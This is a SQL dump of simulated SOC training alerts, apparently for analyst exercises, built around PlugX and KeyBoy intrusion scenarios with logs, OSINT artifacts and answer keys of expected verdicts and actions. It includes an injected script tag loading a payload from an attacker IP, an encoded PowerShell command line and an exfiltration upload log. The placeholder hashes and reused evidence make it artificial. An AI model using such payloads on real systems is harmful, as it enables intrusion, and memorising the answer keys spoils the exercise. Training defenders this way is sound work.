campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mustang Panda malware.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"covid-alerts@healthupdate.org\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered with no legitimate history.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"COVID-19_Guidelines.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains macros that execute PowerShell 
scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via COVID-19 Phishing Email\",\"date\":\"2026-02-08T19:00:02.439Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1170, 'Execution of PlugX Malware', 'high', 'Endpoint Detection and Response (EDR) System', 'The PlugX malware was executed on the victim\'s machine following the opening of a malicious attachment. The malware is designed to evade detection and establish a foothold in the system.', 'Malware Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:11Z\",\"event_id\":\"EDR-20231015-00345\",\"machine_name\":\"victim-pc\",\"user\":\"jdoe\",\"file_executed\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\plugx_launcher.exe\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"source_ip\":\"192.168.1.105\",\"attacker_ip\":\"203.0.113.45\",\"process_id\":4567,\"command_line\":\"\\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\plugx_launcher.exe\\\" --silent\",\"parent_process\":\"explorer.exe\"}', '2026-02-07 21:21:20', '2026-02-23 11:38:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with PlugX malware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for PlugX\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Records\",\"verdict\":\"internal\",\"details\":\"Employee of the organization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1171, 'Establishing Persistence and Data Exfiltration', 'high', 'Network Traffic Analysis', 'With PlugX now active, Mustang Panda attempts to establish persistence on the network and initiate data exfiltration. The network traffic from IP 192.168.1.102 to 203.0.113.25 indicates unauthorized data exfiltration attempts. The PlugX loader matching hash \'e99a18c428cb38d5f260853678922e03\' confirms the malware is present on the host; the persistence mechanism itself (for example an autostart entry or service) should be confirmed from host telemetry rather than inferred from the hash match. Note also that the flow is logged to destination port 80 while described as an encrypted channel, which should be verified against the capture.', 'Persistence and Exfiltration', 'TA0003, TA0010', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T12:45:00Z\",\"src_ip\":\"192.168.1.102\",\"dst_ip\":\"203.0.113.25\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":80,\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"plugx_loader.exe\",\"user\":\"jdoe\",\"event\":\"Data Exfiltration Detected\",\"details\":\"Data transfer of 50MB to external IP 203.0.113.25 using encrypted channel.\"}', '2026-02-07 21:21:20', '2026-02-23 17:38:54', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malicious IP Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control server used by Mustang Panda.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash (32 hex characters) associated with PlugX malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"plugx_loader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Executable used by PlugX malware for 
persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Username of a potentially compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1172, 'Initial Access via Phishing Email', 'high', 'Email security gateway logs', 'Detected a spear-phishing attempt targeting internal user via a malicious Microsoft Office document exploiting a known vulnerability. The email originated from a suspicious external IP and included a compromised document with a known malware hash.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T10:15:30Z\",\"email_id\":\"abc123xyz\",\"from\":\"attacker@example.com\",\"to\":\"victim@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_2023.docx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.22\",\"user\":\"victim@company.com\",\"action\":\"quarantined\"}', '2026-02-07 21:21:24', '2026-02-23 11:19:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with KeyBoy malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Invoice_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing attempts\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-08T19:00:02.454Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1173, 'Malicious Macro Execution', 'high', 'Endpoint detection and response (EDR) logs', 'Upon opening the malicious document, users unknowingly trigger a macro that executes a script, allowing KeyBoy to install a backdoor on the compromised system.', 'Execution', 'T1203', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-04T14:22:18Z\",\"event_id\":\"12345\",\"user\":\"john.doe\",\"user_domain\":\"CORP\",\"host\":\"DESKTOP-5G7H3J4\",\"file_name\":\"Invoice_2023.docm\",\"file_hash\":\"3f7a6bdf1c8b9e7e2c8d7f6a0b3a9e5c\",\"process_name\":\"WINWORD.EXE\",\"process_id\":9876,\"command_line\":\"\\\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE\\\" Invoice_2023.docm\",\"network_activity\":[{\"destination_ip\":\"192.168.1.25\",\"destination_port\":80,\"protocol\":\"HTTP\"},{\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\"}],\"external_ip\":\"203.0.113.45\",\"malicious_macro\":true}', '2026-02-07 21:21:24', '2026-02-23 11:21:50', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Corporate user\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"Invoice_2023.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File contains a known malicious macro\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f7a6bdf1c8b9e7e2c8d7f6a0b3a9e5c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as associated with KeyBoy\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for KeyBoy 
malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1174, 'Persistence through Registry Modification', 'medium', 'Registry change monitoring alerts', 'KeyBoy modifies registry keys to maintain persistence, ensuring their backdoor survives system reboots and remains hidden from basic security scans. Detected modification in registry to include malicious script for persistence.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"event_time\":\"2023-10-12T14:32:45Z\",\"event_type\":\"registry_modification\",\"user\":\"jdoe\",\"user_id\":\"S-1-5-21-3456789012-3456789012-1234567890-1001\",\"src_ip\":\"192.168.1.10\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousScript\",\"registry_value\":\"C:\\\\ProgramData\\\\KeyBoy\\\\malicious_script.exe\",\"hash\":\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\",\"external_ip\":\"203.0.113.45\",\"action\":\"create\",\"process_name\":\"regedit.exe\",\"process_id\":5184,\"file_path\":\"C:\\\\ProgramData\\\\KeyBoy\\\\malicious_script.exe\"}', '2026-02-07 21:21:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as malware associated with KeyBoy APT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\ProgramData\\\\KeyBoy\\\\malicious_script.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security 
Logs\",\"verdict\":\"malicious\",\"details\":\"Malicious script used for persistence by KeyBoy.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User account used for registry modification.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.458Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"user\\\":\\\"jdoe\\\",\\\"user_id\\\":\\\"S-1-5-21-3456789012-3456789012-1234567890-1001\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\",\\\"hash\\\":\\\"3f7a5c9e3c5d8d8e0f3e2c10a5b1a8f1\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"create\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"process_id\\\":5184,\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\KeyBoy\\\\\\\\malicious_script.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1175, 'Lateral Movement using RDP', 'high', 'Network traffic analysis', 'KeyBoy APT group utilized stolen credentials to exploit Remote Desktop Protocol (RDP) for lateral movement across the network. The activity was detected targeting media organizations and NGOs, with the objective of gaining control over additional systems.', 'Lateral Movement', 'T1021.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:22:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"RDP\",\"username\":\"jdoe\",\"event_id\":\"4624\",\"logon_type\":\"10\",\"auth_package\":\"Negotiate\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"KeyBoy_RDP_Exploit.exe\",\"description\":\"Successful remote logon using RDP with potentially compromised credentials.\"}', '2026-02-07 21:21:24', '2026-02-23 11:22:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with KeyBoy APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Credential potentially compromised; used in unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with KeyBoy RDP exploitation tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"KeyBoy_RDP_Exploit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint 
Detection\",\"verdict\":\"malicious\",\"details\":\"Filename identified as part of KeyBoy\'s lateral movement toolkit.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1176, 'Data Exfiltration to Remote Server', 'high', 'Outbound network traffic logs', 'With access established, KeyBoy begins exfiltrating sensitive documents and communications to a remote server, compromising the integrity and confidentiality of the targeted organizations.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"10.0.0.15\",\"source_port\":443,\"destination_ip\":\"203.0.113.45\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"http_method\":\"POST\",\"uri\":\"/upload\",\"filename\":\"confidential_docs.zip\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"username\":\"jdoe\",\"transaction_id\":\"abc123def456\",\"file_size\":1048576}', '2026-02-07 21:21:24', '2026-02-23 11:37:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by KeyBoy APT\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware-related hash\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_docs.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local File Database\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity for this user\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Employee of the organization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1177, 'Suspicious Website Activity Detected', 'high', 'Web Traffic Analysis', 'An advanced watering hole attack was detected. Malicious scripts were injected into a legitimate government website frequented by officials, establishing an initial access point in the infiltration strategy.', 'Watering Hole Attack', 'T1189', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T09:15:32Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"referrer\":\"https://gov-portal.example.com\",\"malicious_script\":\"<script src=\'http://203.0.113.45/malicious.js\'></script>\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious.js\",\"username\":\"jdoe\",\"event_id\":\"evt-2023-1014-0001\"}', '2026-02-07 21:22:02', '2026-02-22 20:45:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber 